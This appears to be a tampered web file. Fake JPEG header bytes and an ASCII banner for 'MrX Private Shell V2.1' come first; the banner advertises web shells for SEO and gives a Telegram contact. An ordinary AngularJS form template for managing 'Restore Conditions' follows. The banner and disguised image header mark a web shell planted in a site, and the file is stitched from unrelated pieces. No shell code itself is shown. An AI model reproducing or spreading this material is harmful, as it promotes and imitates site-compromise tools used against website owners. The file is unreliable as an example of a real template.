����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<div ng-controller="restoreConditionManage as $ctrl" class="controller-box">
<h1 ng-if="saveData._id">{{ lang.t("Modify Restore Condition \"%s\"", details.title) }}</h1>
<h1 ng-if="!saveData._id">{{ lang.t("Create New Restore Condition") }}</h1>
<div class="row">
<div class="col-md-12 col-sm-12 col-xs-12">
<div class="x_panel">
<div class="x_content">
<br>
<form data-parsley-validate="" class="form-horizontal form-label-left" novalidate>
<div class="form-group">
<label class="control-label col-md-3 col-sm-3 col-xs-12" for="title">{{ lang.t("Condition") }} <span class="required">*</span></label>
<div class="col-md-6 col-sm-6 col-xs-12">
<input id="title" class="form-control col-md-7 col-xs-12" type="text" ng-model="saveData.condition" value="" />
<p class="help-block">{{ lang.t("Specify the condition text") }}</p>
</div>
</div>
<div class="ln_solid"></div>
<div class="form-group">
<div class="col-md-6 col-sm-6 col-xs-12 col-md-offset-3" ng-if="changed">
<button type="button" class="btn btn-default" ng-click="cancel()">{{ lang.t("Cancel") }}</button>
<button type="button" class="btn btn-primary" ng-click="saveChanges(true)" ng-disabled="saveing">{{ lang.t("Apply") }}</button>
<button type="button" class="btn btn-primary" ng-click="saveChanges()" ng-disabled="saveing">{{ lang.t("Save") }}</button>
</div>
<div class="col-md-6 col-sm-6 col-xs-12 col-md-offset-3" ng-if="!changed">
<a href="{{primaryURL}}/restoreConditions" class="btn btn-default" ng-click="changeView('/restoreConditions')">{{ lang.t("Back to Restore Conditions") }}</a>
</div>
</div>
</form>
</div>
</div>
</div>
</div>
</div>